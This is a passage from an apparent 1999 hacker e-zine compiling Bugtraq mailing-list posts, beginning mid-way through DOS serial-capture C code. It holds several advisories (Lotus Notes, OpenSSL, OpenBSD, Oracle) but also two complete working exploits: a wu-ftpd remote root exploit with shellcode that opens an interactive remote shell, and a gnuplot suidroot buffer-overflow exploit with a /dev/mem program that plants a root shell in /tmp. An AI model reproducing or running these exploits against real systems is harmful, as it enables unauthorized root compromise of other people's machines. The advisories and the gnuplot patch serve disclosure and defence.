(t3 & 1) nm++; t1 = t1 >> 1; t2 = t2 >> 1; t3 = t3 >> 1; } if (nm < 5) { st = 1; ns = 0; } else if (nm > 35) { if (st==1) { shob(); } st = 0; ns = 0; } } void main (int argc) { unsigned int n,i=0,j,k,l,cw1=49,cw0=48; FILE *out; char s=48; double pl,dt,exc=0.0,clk=0.0,xct; if (argc > 1) { printf ("Reverse Polarity.\n"); cw1 = 48; cw0 = 49; } /* dt is the number of expected clock ticks per bit */ dt = 1.0/(4800.0*838.8e-9); oldfuncc = getvect(0x0c); /* save COM1 Vector */ setvect (0x0c, com1int); /* Capture COM1 vector */ n = inportb (0x21); /* enable IRQ4 interrupt */ outportb(0x21, n & 0xef); set8253(); /* set up 8253 timer chip */ set8250(); /* set up 8250 UART */ while ((kbhit() == 0) && (fobp<29900)) { if (i != cpstn) { if ( ( fdata[i] & 0x8000) != 0) s = cw1; else s = cw0; /* add in new number of cycles to clock */ clk += (fdata[i] & 0x7fff); xct = exc + 0.5 * dt; /* exc is current boundary */ while ( clk >= xct ) { frame_sync(s); clk = clk - dt; } /* clk now holds new boundary position. update exc slowly... */ /* 0.005 sucks; 0.02 better; 0.06 mayber even better; 0.05 seems pretty good */ exc = exc + 0.020*(clk - exc); i++; if( i >buflen) i = 0; } } outportb (0x21, n); /* disable IRQ4 interrupt */ setvect (0x0c, oldfuncc); /* restore old COM1 Vector */ /* save captured data to disk file */ i = 0; out = fopen("data.dat","wt"); if (out == NULL) { printf ("couldn't open output file.\n"); exit(1); } i = 0; while ( (i < fobp) && (i < 29800)) { j = ((int)fob[i] & 0xff); i++; for (k=0; k=32) fprintf(out,"%c",n); else fprintf(out,"."); } fprintf(out,"\n"); } fprintf(out,"\n"); } fclose(out); } @HWA 30.0 Bugtraq: Lotus Notes security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ To: BUGTRAQ@netspace.org Security advisory Advisory released Mar 23 1999 ----- Application: Lotus Notes Client (Version 4.5, probably others) Impact: Encrypted mail sent from the Notes client may traverse the network in the clear and may be stored on the mail server unencrypted. Author: Martin Bartosch ----- Synopsis -------- When performing network analysis experiments with the Lotus Notes Client a very subtle bug was discovered that may lead to inadvertent revelation of confidential information. Usually the Notes client sends at least two copies of a newly created mail. One copy is sent to the recipient, the other is stored in the "Sent Mail" folder of the sender's Notes server. If an encrypted mail is to be sent and the conditions for this bug are met, the copy for the sender's "Sent Mail" folder is not encrypted. As a result, the message is sent to the Notes server in the clear and stored on the Notes server unencrypted. The message may thus be intercepted and read by analyzing the network traffic between the sender's Notes client and the server or by directly accessing the "Sent Mail" folder on the Notes server. The user is not given any warning or notification about the problem, and the problem causes almost no noticable side effects. As a result, if a user is affected by the problem, this will probably remain unnoticed. Lotus is currently working on the problem, a detailed analysis and official fixes may be available soon. Once this is available, it should be preferred to the workaround presented in this document. Details ------- The problem seems to result from an inadequate check condition in the client code. Traditionally Windows, DOS and OS/2 use the backslash character ('\') as a path separator, whereas Unix systems use the slash ('/') for this purpose. Applications that deal with both styles need to be aware of the problem and have to take care of paths passed to applications or services on other systems. The user's database usually is located on a remote server. Though Notes clients are normally Windows style systems, the servers may either run Windows, OS/2 or Unix as the server operating system. Thus Notes needs to take care of proper translation of file paths as files are accessed on various platforms. Notes accesses databases by specifying the server and the path to the database. In order to open a user's database in the first place, the user needs to enter the correct path to the database or traverse the directory tree on the server. When the database has been opened, Notes remembers the path to the database for subsequent access to this database. Internally the Notes client seems to store the path to the database using the client operating system file naming conventions. In particular, on Windows or OS/2 platforms, Notes uses Backslash characters ('\') as path separators. The current Notes environment settings may be changed by opening the environment document (File/Mobile/Edit current environment). In the second entry of the section "Mail" the path to the mail file can be changed by the user. Notes uses this entry for various purposes. One of these is the periodical check for new mail or agenda events. (If the user specifies an incorrect path here, mail notification does not work any longer.) To address the backslash-slash problem, Notes seems to translate any path entered by the user into the proper representation needed for accessing the service required. Apparently it does not matter at all if paths are entered with slashes or backslashes as path separators. The GUI dialogs accept any spelling as well as the environment document mentioned above. However, if for some reason the environment document of a Windows style client specifies the mail file with *slashes* as a path separator (like e. g. mail/users/user.nsf instead of mail\users\user.nsf) Notes does a proper translation of the path and almost all functions will work as expected. Except for one side effect: Notes does not recognize the specified database as the user's mail database. Probably a simple string compare between the currently opened mail database and the database path of the environment document is performed, and this comparison fails because of the different representation of paths. The resulting effect: if an encrypted mail is to be sent and the environment document does contain a mail database path with 'incorrect' path separators as seen from the client OS view, the mail copy for the user's "Sent Mail" folder is being sent to the user's database in the plain and stored unencrypted on the server. The contents of the message may be read in plain text by sniffing on the network or by directly accessing the notes database. The behaviour described can be reproduced with almost any Notes client and server combination. Even if both the server and client use the same operating system, it is still possible to enter the mail path separated with slash characters. The Notes client will behave as described above. Detection --------- - compose a new mail message - address this message to some other user - using the mail properties dialog enable encryption for this individual message - send message - change to the "Sent Mail" folder of your mail database - right-click on the sent message once - open the properties dialog for this document - choose "fields" in the document properties - check existence of the fields "$Seal", "$SealData" and "Body" Under normal circumstances the "$Seal"/"$SealData" and "Body" fields are mutually exclusive. The existence of "$Seal" and "$SealData" usually indicate that the message was properly encrypted. If the field "Body" exists, this message is stored in the plain on the server and was transferred unencrypted across the network. Alternatively the network traffic can be analyzed while sending an encrypted mail. This is how the bug was discovered in the first place. Workaround ---------- The workaround described here may be an incomplete fix for the problem; the problem may be triggered by other conditions as well. As Lotus is actively investigating on the problem, the solution presented by Lotus may be more general and should be preferred once it is available. First method: Open your environment document. The path to the database must *not* contain any path separator characters that are not natively used by the client operating system. When using a Windows or OS/2 environment, the path must only contain backslash '\' characters. Example: Mail File: mail\path\to\user.nsf * OK * Mail File: mail/path/to/user.nsf * DANGER! * A client restart is required to make the changes effective. Second method: In your global preferences check the "Encrypt saved mail" box. Every message you send will be encrypted when saving the message to the "Sent Mail" folder on the server. Use both methods to be sure that mail sent by the client is not sent and stored in the clear. Be aware that using the second methond will result in encryption of the whole database and that loss of your passphrase or Notes ID will effectively cause loss of your mail database contents. Vendor activities ----------------- Lotus has been informed of this bug and is currently working on the problem. An official fix or workaround will be published by Lotus. Credits ------- Michael Doberenz; Michael Popp whose network analysis experiments revealed that there was a problem in the first place Artur Hahn found the real reason (path separator issue) for the Notes encryption problem -- Martin Bartosch bartosch@mail.deuba.com This message and any statements expressed therein are those of myself and not of the Deutsche Bank AG or its subsidiary companies. @HWA 31.0 Bugtraq: New FTP exploit ~~~~~~~~~~~~~~~~~~~~~~~~ Approved-By: aleph1@UNDERGROUND.ORG Received: from smtp3.xs4all.nl (smtp3.xs4all.nl [194.109.6.53]) by netspace.org (8.8.7/8.8.7) with ESMTP id LAA25208 for ; Mon, 22 Mar 1999 11:10:17 -0500 Received: from xs3.xs4all.nl (pietern@xs3.xs4all.nl [194.109.6.44]) by smtp3.xs4all.nl (8.8.8/8.8.8) with ESMTP id RAA03847 for ; Mon, 22 Mar 1999 17:10:23 +0100 (CET) Received: from localhost (pietern@localhost) by xs3.xs4all.nl (8.9.0/8.9.0) with ESMTP id RAA18937 for ; Mon, 22 Mar 1999 17:10:23 +0100 (CET) MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Message-ID: Date: Mon, 22 Mar 1999 17:10:23 +0100 Reply-To: Pieter Nieuwenhuijsen Sender: Bugtraq List From: Pieter Nieuwenhuijsen Subject: ftp exploit To: BUGTRAQ@netspace.org /* THIS IS PRIVATE! DO NOT DISTRIBUTE!!!! PRIVATE! WU-FTPD REMOTE EXPLOIT Version wu-2.4.2-academ[BETA-18](1) for linux x86 (redhat 5.2) by duke duke@viper.net.au BIG thanks to stran9er for alot of help with part of the shellcode! i fear stran9er, but who doesn't? !@$ :) Greets to: #!ADM, el8.org users, To exploit this remotely they need to have a directory you can have write privlidges to.. this is the argument.. you can also use this locally by specifying -l -p with the = your home directory or something..(must begin with '/') also alignment arg is how return address is aligned.. shouldnt need it, but if u do it should be between 0 and 3 It takes about 10 seconds after "logged in" so be patient. -duke */ #include #include #include #include #include #include //#include //#include #include #include #define RET 0xbfffa80f void logintoftp(); void sh(); void mkd(char *); int max(int, int); long getip(char *name); char shellcode[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\xb0\x17\xcd\x80" "\x31\xc0\x31\xdb\xb0\x2e\xcd\x80" "\xeb\x4f\x31\xc0\x31\xc9\x5e\xb0\x27\x8d\x5e\x05\xfe\xc5\xb1\xed" "\xcd\x80\x31\xc0\x8d\x5e\x05\xb0\x3d\xcd\x80\x31\xc0\xbb\xd2\xd1" "\xd0\xff\xf7\xdb\x31\xc9\xb1\x10\x56\x01\xce\x89\x1e\x83\xc6\x03" "\xe0\xf9\x5e\xb0\x3d\x8d\x5e\x10\xcd\x80\x31\xc0\x88\x46\x07\x89" "\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd" "\x80\xe8\xac\xff\xff\xff"; char tmp[256]; char name[128], pass[128]; int sockfd; int main(int argc, char **argv) { char sendln[1024], recvln[4048], buf1[800], buf2[1000]; char *p, *q, arg, **fakeargv = (char **) malloc(sizeof(char *)*(argc + 1)); int len, offset = 0, i, align=0; struct sockaddr_in cli; if(argc < 3){ printf("usage: %s [-l name] [-p pass] [-a ] [-o offset]\n", argv[0]); exit(0); } for(i=0; i < argc; i++) { fakeargv[i] = (char *)malloc(strlen(argv[i]) + 1); strncpy(fakeargv[i], argv[i], strlen(argv[i]) + 1); } fakeargv[argc] = NULL; while((arg = getopt(argc,fakeargv,"l:p:a:o:")) != EOF){ switch(arg) { case 'l': strncpy(name,optarg,128); break; case 'p': strncpy(pass,optarg,128); break; case 'a': align=atoi(optarg); break; case 'o': offset=atoi(optarg); break; default: printf("usage: %s [-l name] [-p pass] [-a ] [-o offset]\n", argv[0]); exit(0); break; } } if(name[0] == 0) strcpy(name, "anonymous"); if(pass[0] == 0) strcpy(pass, "hi@blahblah.net"); bzero(&cli, sizeof(cli)); bzero(recvln, sizeof(recvln)); bzero(sendln, sizeof(sendln)); cli.sin_family = AF_INET; cli.sin_port = htons(21); cli.sin_addr.s_addr=getip(argv[1]); if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){ perror("socket"); exit(0); } if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){ perror("connect"); exit(0); } while((len = read(sockfd, recvln, sizeof(recvln))) > 0){ recvln[len] = '\0'; if(strchr(recvln, '\n') != NULL) break; } logintoftp(sockfd); printf("logged in.\n"); bzero(sendln, sizeof(sendln)); for(i=align; i<996; i+=4) *(long *)&buf2[i] = RET + offset; memcpy(buf2, "a", align); memset(buf1, 0x90, 800); memcpy(buf1, argv[2], strlen(argv[2])); mkd(argv[2]); p = &buf1[strlen(argv[2])]; q = &buf1[799]; *q = '\x0'; while(p <= q){ strncpy(tmp, p, 200); mkd(tmp); p+=200; } mkd(shellcode); mkd("bin"); mkd("sh"); p = &buf2[0]; q = &buf2[999]; while(p <= q){ strncpy(tmp, p, 250); mkd(tmp); p+=250; } sh(sockfd); close(sockfd); printf("finit.\n"); } void mkd(char *dir) { char snd[512], rcv[1024]; char blah[1024], *p; int n; struct timeval tv; fd_set fds; bzero(&tv, sizeof(tv)); tv.tv_usec=50; bzero(blah, sizeof(blah)); p = blah; for(n=0; n 0){ rcv[n] = 0; if(strchr(rcv, '\n') != NULL) break; } return; } void logintoftp() { char snd[1024], rcv[1024]; int n; printf("logging in with %s: %s\n", name, pass); memset(snd, '\0', 1024); sprintf(snd, "USER %s\r\n", name); write(sockfd, snd, strlen(snd)); while((n=read(sockfd, rcv, sizeof(rcv))) > 0){ rcv[n] = 0; if(strchr(rcv, '\n') != NULL) break; } memset(snd, '\0', 1024); sprintf(snd, "PASS %s\r\n", pass); write(sockfd, snd, strlen(snd)); while((n=read(sockfd, rcv, sizeof(rcv))) > 0){ rcv[n] = 0; if(strchr(rcv, '\n') != NULL) break; } return; } void sh() { char snd[1024], rcv[1024]; fd_set rset; int maxfd, n; strcpy(snd, "cd /; uname -a; pwd; id;\n"); write(sockfd, snd, strlen(snd)); for(;;){ FD_SET(fileno(stdin), &rset); FD_SET(sockfd, &rset); maxfd = max(fileno(stdin), sockfd) + 1; select(maxfd, &rset, NULL, NULL, NULL); if(FD_ISSET(fileno(stdin), &rset)){ bzero(snd, sizeof(snd)); fgets(snd, sizeof(snd)-2, stdin); write(sockfd, snd, strlen(snd)); } if(FD_ISSET(sockfd, &rset)){ bzero(rcv, sizeof(rcv)); if((n = read(sockfd, rcv, sizeof(rcv))) == 0){ printf("EOF.\n"); exit(0); } if(n < 0){ perror("read"); exit(-1); } fputs(rcv, stdout); } } } int max(int x, int y) { if(x > y) return(x); return(y); } long getip(char *name) { struct hostent *hp; long ip; if ((ip=inet_addr(name))==-1) { if ((hp=gethostbyname(name))==NULL) { fprintf(stderr,"Can't resolve host.\n"); exit (1); } memcpy(&ip, (hp->h_addr), 4); } return ip; } @HWA 32.0 Bugtraq: OpenSSL and SSLeay Advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ OpenSSL and SSLeay Security Alert --------------------------------- It was recently realised that packages that use SSLeay and OpenSSL may suffer from a security problem: under some circumstances, SSL sessions can be reused in a different context from their original one. This may allow access controls based on client certificates to be bypassed. Unfortunately, before the the problem was fully understood, it was discussed on various public lists. The OpenSSL team have therefore decided to release an interim version of OpenSSL which addresses the problem by disabling session reuse except in limited circumstances (see below). A future version will deal with the problem more elegantly by redoing verification on reused sessions when necessary. Although this problem is not strictly a defect in OpenSSL, it is rather tricky for applications to be coded correctly to avoid the problem due to the sketchy nature of SSLeay/OpenSSL documentation. We therefore decided to protect applications from within OpenSSL. The problem ----------- SSL sessions include a session ID which allows initial setup to be bypassed once a session has been established between a client and server. This session ID, when presented by the client, causes the same master key to be used as was used on the previous connection, thus saving considerable session setup time. When the session is reused in this manner, all access controls based on client certificates are bypassed, on the grounds that the original session would have made the necessary checks. Unfortunately, the lack of documentation has resulted in the caching structures being used in certain applications without appropriate care being taken to assure that the cached sessions are only available at the appropriate moments. As a result it is sometimes possible for a specially written SSL client to fraudulently obtain an SSL connection which requires access control by reusing a previous session which had different or no access control. The problem affects servers which support session reuse and which have multiple virtual hosts served from a single server, where some virtual hosts use differing client server verifications. Note that "different" includes no verification on some hosts, and verification on others, or different CAs for different hosts. In order to exploit this problem carefully written client software would need to be written. The attacker would need considerable knowledge of the SSL protocol. Standard web browsers will not and cannot be made to use SSL in this way. Affected software ----------------- All server software using SSLeay or versions of OpenSSL prior to version 0.9.2b that support multiple virtual hosts with different client certificate verification may be vulnerable. This includes, but is not limited to: Apache-SSL http://www.apache-ssl.org/ mod_ssl http://www.engelschall.com/sw/mod_ssl/ Raven http://www.covalent.net/ Stronghold http://www.c2.net/ The solution ------------ Download OpenSSL 0.9.2b (see http://www.openssl.org) and build it in the usual way. Check the application for updates, and download those, too (NB: this step is not necessarily required, the updated library will fix the problem). The versions of the applications listed above that you should use are: Apache_SSL 1.3.4+1.32 mod_ssl 2.2.6-1.3.4 Raven 1.4.0 Stronghold 2.4.2 Rebuild the application (if needed). If you are an application author, you should look in to the use of SSL_set_session_id_context(), which can be used to reenable session reuse when appropriate. Known exploits -------------- There are no known exploits of this security hole. Ben Laurie, for the OpenSSL team. -- http://www.apache-ssl.org/ben.html "My grandfather once told me that there are two kinds of people: those who work and those who take the credit. He told me to try to be in the first group; there was less competition there." - Indira Gandhi @HWA 33.0 Recent OpenBSD security advisories ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.openbsd.org/security.html#24 Approved-By: aleph1@UNDERGROUND.ORG Received: from cvs.openbsd.org (root@cvs.openbsd.org [199.185.137.3]) by netspace.org (8.8.7/8.8.7) with ESMTP id PAA26180 for ; Tue, 2 Mar 1999 15:08:12 -0500 Received: from cvs.openbsd.org (IDENT:deraadt@localhost [127.0.0.1]) by cvs.openbsd.org (8.9.3/8.9.1) with ESMTP id NAA19006 for ; Tue, 2 Mar 1999 13:08:25 -0700 (MST) Message-ID: <199903022008.NAA19006@cvs.openbsd.org> Date: Tue, 2 Mar 1999 13:08:22 -0700 Reply-To: Theo de Raadt Sender: Bugtraq List From: Theo de Raadt Subject: New OpenBSD security-related patches To: BUGTRAQ@netspace.org There are a couple of new OpenBSD 2.4 security-related patches at http://www.openbsd.org/security.html#24 We do not normally publish long wordy advisories to mailing lists (not enough time in the day). That said, I'm surprised that other readers of BUGTRAQ don't advise each other (publically) when new entries show up in our patches archive. I'm sure some of these fixes affect other systems.. -=- "If we are so much greater than the sum of all our parts how come we're 90% water?" - Ed -=- From the site: OpenBSD 2.4 Security Advisories These are the OpenBSD 2.4 advisories -- all these problems are solved in OpenBSD current. Obviously, all the OpenBSD 2.3 advisories listed below are fixed in OpenBSD 2.4. Mar 22, 1999: The nfds argument for poll(2) needs to be constrained, to avoid kvm starvation (patch included). Mar 21, 1999: A change in TSS handling stops another kernel crash case caused by the crashme program (patch included). Feb 25, 1999: An unbounded increment on the nlink value in FFS and EXT2FS filesystems can cause a system crash. (patch included). Feb 23, 1999: Yet another buffer overflow existed in ping(8). (patch included). Feb 19, 1999: ipintr() had a race in use of the ipq, which could permit an attacker to cause a crash. (patch included). Feb 17, 1999: A race condition in the kernel between accept(2) and select(2) could permit an attacker to hang sockets from remote. (patch included). Feb 17, 1999: IP fragment assembly can bog the machine excessively and cause problems. (patch included). Feb 12, 1999: i386 T_TRCTRAP handling and DDB interacted to possibly cause a crash. (patch included). Feb 11, 1999: TCP/IP RST handling was sloppy. (patch included). Nov 27, 1998: There is a remotely exploitable problem in bootpd(8). (patch included). Nov 19, 1998: There is a possibly locally exploitable problem relating to environment variables in termcap and curses. (patch included). Nov 13, 1998: There is a remote machine lockup bug in the TCP decoding kernel. (patch included). OpenBSD 2.3 Security Advisories These are the OpenBSD 2.3 advisories -- all these problems are solved in OpenBSD current. Obviously, all the OpenBSD 2.2 advisories listed below are fixed in OpenBSD 2.3. Nov 27, 1998: There is a remotely exploitable problem in bootpd(8). (patch included). Nov 13, 1998: There is a remote machine lockup bug in the TCP decoding kernel. (patch included). Jul 2, 1998: setuid and setgid processes should not be executed with fd slots 0, 1, or 2 free. (patch included). August 31, 1998: A benign looking resolver buffer overflow bug was re-introduced accidentally (patches included). June 6, 1998: Further problems with the X libraries (patches included). June 4, 1998: on non-Intel i386 machines, any user can use pctr(4) to crash the machine. May 17, 1998: kill(2) of setuid/setgid target processes too permissive (4th revision patch included). May 11, 1998: mmap() permits partial bypassing of immutable and append-only file flags. (patch included). May 1, 1998: Buffer overflow in xterm and Xaw (CERT advisory VB-98.04) (patch included). May 5, 1998: Incorrect handling of IPSEC packets if IPSEC is enabled (patch included). OpenBSD 2.2 Security Advisories These are the OpenBSD 2.2 advisories. All these problems are solved in OpenBSD 2.3. Some of these problems still exist in other operating systems. (The supplied patches are for OpenBSD 2.2; they may or may not work on OpenBSD 2.1). May 5, 1998: Incorrect handling of IPSEC packets if IPSEC is enabled (patch included). May 1, 1998: Buffer overflow in xterm and Xaw (CERT advisory VB-98.04) (patch included). Apr 22, 1998: Buffer overflow in uucpd (patch included). Apr 22, 1998: Buffer mismanagement in lprm (patch included). Mar 31, 1998: Overflow in ping -R (patch included). Mar 30, 1998: Overflow in named fake-iquery (patch included). Mar 2, 1998: Accidental NFS filesystem export (patch included). Feb 26, 1998: Read-write mmap() flaw. Revision 3 of the patch is available here Feb 19, 1998: Sourcerouted Packet Acceptance. A patch is available here. Feb 13, 1998: Setuid coredump & Ruserok() flaw (patch included). Feb 9, 1998: MIPS ld.so flaw (patch included). Dec 10, 1997: Intel P5 f00f lockup (patch included). OpenBSD 2.1 Security Advisories These are the OpenBSD 2.1 advisories. All these problems are solved in OpenBSD 2.2. Some of these problems still exist in other operating systems. (If you are running OpenBSD 2.1, we would strongly recommend an upgrade to the newest release, as this patch list only attempts at fixing the most important security problems. In particular, OpenBSD 2.2 fixes numerous localhost security problems. Many of those problems were solved in ways which make it hard for us to provide patches). Sep 15, 1997: Deviant Signals (patch included) Aug 2, 1997: Rfork() system call flaw (patch included) Jun 24, 1997: Procfs flaws (patch included) Watching our Security Changes Since we take a proactive stance with security, we are continually finding and fixing new security problems. Not all of these problems get widely reported because (as stated earlier) many of them are not confirmed to be exploitable; many simple bugs we fix do turn out to have security consequences we could not predict. We do not have the time resources to make these changes available in the above format. Thus there are usually minor security fixes in the current source code beyond the previous major OpenBSD release. We make a limited guarantee that these problems are of minimal impact and unproven exploitability. If we discover that a problem definitely matters for security, patches will show up here VERY quickly. @HWA 34.0 Oracle is insecure at initial installation ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Approved-By: aleph1@UNDERGROUND.ORG Received: from majestic.tcs.tulane.edu (majestic.tcs.tulane.edu [129.81.224.6]) by netspace.org (8.8.7/8.8.7) with ESMTP id QAA32299 for ; Thu, 4 Mar 1999 16:37:24 -0500 Received: from xftpd (h107.s156.tulane.edu [129.81.156.107]) by majestic.tcs.tulane.edu (8.9.3/8.9.3) with SMTP id PAA09523 for ; Thu, 4 Mar 1999 15:36:58 -0600 (CST) MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4 Importance: Normal Message-ID: <000201be6688$33466770$6b9c5181@xftpd.tulane.edu> Date: Thu, 4 Mar 1999 15:44:37 -0600 Reply-To: James Kivisild Sender: Bugtraq List From: James Kivisild Subject: Oracle Plaintext Password To: BUGTRAQ@netspace.org I now know this has been mentioned before, however I've gotten a large number of responses from people about Oracle problems similar to this. As a first time Oracle installer, I didn't realize the scope of the problem. I hope that upon reading this, more people will realize that the Default settings under Oracle just aren't secure. Original Post to NTBugtraq: I apologize if this has been mentioned before, however I haven't had any time to pursue this issue with any vigor. I recently installed Oracle 8.0.3 Enterprise Edition on an NT 4.0 Workstation and I noticed a particular feature within Oracle Database Assistant v1.0 that might be of some interest/concern. During the creation of an Oracle database, the Database Assistant lets you create either a custom or typical(default) database. If you select "custom" database, you must enter a master password that controls the administrative features in the database. If you select "typical", this password defaults to 'oracle'. As the database is created, the Server Manager reports all activities to a log file. This log file, "\orant\database\spoolmain.log", even logs the master password as it connects to the server to continue the setup. The entry is as follows: Echo ON SVRMGR> connect INTERNAL/MYPASSWORD Connected. Not only is this password in plaintext, but the file has permissions that enable anyone to view it. (owned by Admins, but full control for everyone) I believe the setup informs you that the file exists and should be checked for errors, but I didn't find any other reference to it in the documentation. The log does get overwritten each time you create a new database, however that just limits the number of plaintext passwords to one. Once again, I haven't had time to look into this, but it seems like a potential problem worth mentioning. -James Kivisild @HWA 35.0 GnuPlot buffer overflow exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Approved-By: aleph1@UNDERGROUND.ORG Received: from inferno.tusculum.edu (qmailr@inferno.tusculum.edu [206.228.254.202]) by netspace.org (8.8.7/8.8.7) with SMTP id QAA02678 for ; Thu, 4 Mar 1999 16:55:02 -0500 Received: (qmail 484 invoked by uid 1111); 4 Mar 1999 21:55:18 -0000 Message-ID: <19990304215518.483.qmail@inferno.tusculum.edu> Date: Thu, 4 Mar 1999 21:55:18 -0000 Reply-To: xnec@INFERNO.TUSCULUM.EDU Sender: Bugtraq List From: xnec@INFERNO.TUSCULUM.EDU Subject: Linux /usr/bin/gnuplot overflow To: BUGTRAQ@netspace.org greetings, INFO: There is a local root comprimise in /usr/bin/gnuplot version Linux version 3.5 (pre 3.6) patchlevel beta 336. gnuplot is shipped to install suidroot on SuSE 5.2 and maybe others. The exploit starts as a simple $HOME buffer overflow, but much like zgv holes in the past, it drops root privs before the overflow occurs. However, as Nergal describes at http://www.geek-girl.com/bugtraq/1998_4/0148.html, svgalib needs write access to /dev/mem, and we can therefore regain root privs by overwriting our uid. the offending code appears in plot.c where we see: char home[80]; ... char *tmp_home=getenv(HOME); ... strcpy(home,tmp_home); EXPLOIT: xnec_plot.c ---snip--- /* gnuplot Linux x86 exploit from xnec tested on gnuplot Linux version 3.5 (pre 3.6) patchlevel beta 336/SuSE 5.2 gnuplot ships suidroot by default in SuSE 5.2, maybe others gcc -o xnec_plot xnec_plot.c ./xnec_plot The buffer we're overflowing is only 80 bytes, so we're going to have to get our settings just so. If you don't feel like typing in command line offsets and bufsizes, make a little shell script: --- #! /bin/bash bufsiz=110 offset=0 while [ $offset -lt 500 ]; do ./xnec_plot $bufsiz $offset offset=`expr $offset + 10` done --- since gnuplot drops root privs after it inits your svga, we can't just exec /bin/sh, we'll need to use the technique of replacing our saved uid in /dev/mem with '0', then execing whatever we please. We do this by compiling Nergal's program, mem.c and putting the output file in /tmp/xp, as in gcc -o /tmp/xp mem.c. Nergal's program will then make /tmp/sh suidroot, so don't forget to cp /bin/sh /tmp/sh. You will also have to change line 32 to the correct address of kstat, which can be obtained by doing strings /proc/ksyms | grep kstat. Since I can see absolutely no reason for gnuplot to be suidroot, the best fix is chmod -s /usr/bin/gnuplot. greets to #sk1llz, xnec on EFnet and DALnet */ #include #define DEFAULT_OFFSET 50 #define DEFAULT_BUFSIZ 110 #define NOP 0x90 #define DEFAULT_ADDR 0xbffff81c /* Aleph One's shellcode, modified to run our own program */ char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/tmp/xp"; unsigned long getsp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char *argv[]) { char *buf, *ret; long *addrp, addr; int bufsiz, offset; int i; bufsiz=DEFAULT_BUFSIZ; offset=DEFAULT_OFFSET; if (argc = 2) bufsiz = atoi(argv[1]); if (argc = 3) offset = atoi(argv[2]); buf=malloc(bufsiz); addr = getsp() - offset; printf("address: 0x%x\n", addr); printf("bufsize: %d\n", bufsiz); printf("offset : %d\n", offset); ret = buf; addrp = (long *) ret; for (i = 0; i < bufsiz; i+=4) *(addrp++) = addr; memset(buf, NOP, (strlen(shellcode)/2)); ret = buf + ((bufsiz/2) - (strlen(shellcode)/2)); for (i = 0; i < strlen(shellcode); i++) *(ret++) = shellcode[i]; buf[bufsiz - 1] = '\0'; memcpy(buf,"HOME=", 5); setenv("HOME", buf, 1); execvp("/usr/bin/gnuplot", NULL); } ---snip--- mem.c ---snip--- /* by Nergal */ #define SEEK_SET 0 #define __KERNEL__ #include #undef __KERNEL__ #define SIZEOF sizeof(struct task_struct) int mem_fd; int mypid; void testtask (unsigned int mem_offset) { struct task_struct some_task; int uid, pid; lseek (mem_fd, mem_offset, SEEK_SET); read (mem_fd, &some_task, SIZEOF); if (some_task.pid == mypid) /* is it our task_struct ? */ { some_task.euid = 0; some_task.fsuid = 0; /* needed for chown */ lseek (mem_fd, mem_offset, SEEK_SET); write (mem_fd, &some_task, SIZEOF); /* from now on, there is no law beyond do what thou wilt */ chown ("/tmp/sh", 0, 0); chmod ("/tmp/sh", 04755); exit (0); } } #define KSTAT 0x001a8fb8 /* <-- replace this addr with that of your kstat */ main () /* by doing strings /proc/ksyms |grep kstat */ { unsigned int i; struct task_struct *task[NR_TASKS]; unsigned int task_addr = KSTAT - NR_TASKS * 4; mem_fd = 3; /* presumed to be opened /dev/mem */ mypid = getpid (); lseek (mem_fd, task_addr, SEEK_SET); read (mem_fd, task, NR_TASKS * 4); for (i = 0; i < NR_TASKS; i++) if (task[i]) testtask ((unsigned int)(task[i])); } ---snip--- FIX: Since I see absolutely no good reason why gnuplot should be suidroot (who, besides root, is going to run it, anyway?), I would recommend a simple chmod -s /usr/bin/gnuplot. If you absolutely insist on suid, here's the patch: --- plot.c.old Fri Mar 5 03:17:59 1999 +++ plot.c Fri Mar 5 03:29:19 1999 @@ -516,7 +516,7 @@ char c='\0';/* character that should be added, or \0, if none */ if(tmp_home) { - strcpy(home,tmp_home); + strncpy(home,tmp_home,(sizeof(home) - 1)); if( strlen(home) ) p = &home[strlen(home)-1]; else p = home; #if defined(MSDOS) || defined(ATARI) || defined( OS2 ) || defined(_Windows) || defined(DOS386) However, this by no means was a comprehensive security audit of gnuplot, so there may very well be a dozen other problems I've not fixed. -xnec ################################################################## # xnec@inferno.tusculum.edu - xnec on IRC EF and DALnet # ################################################################## @HWA AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ $$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$$ ! ! $ $ ! *** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! ** ! $ $ ! ! $$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$ www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com 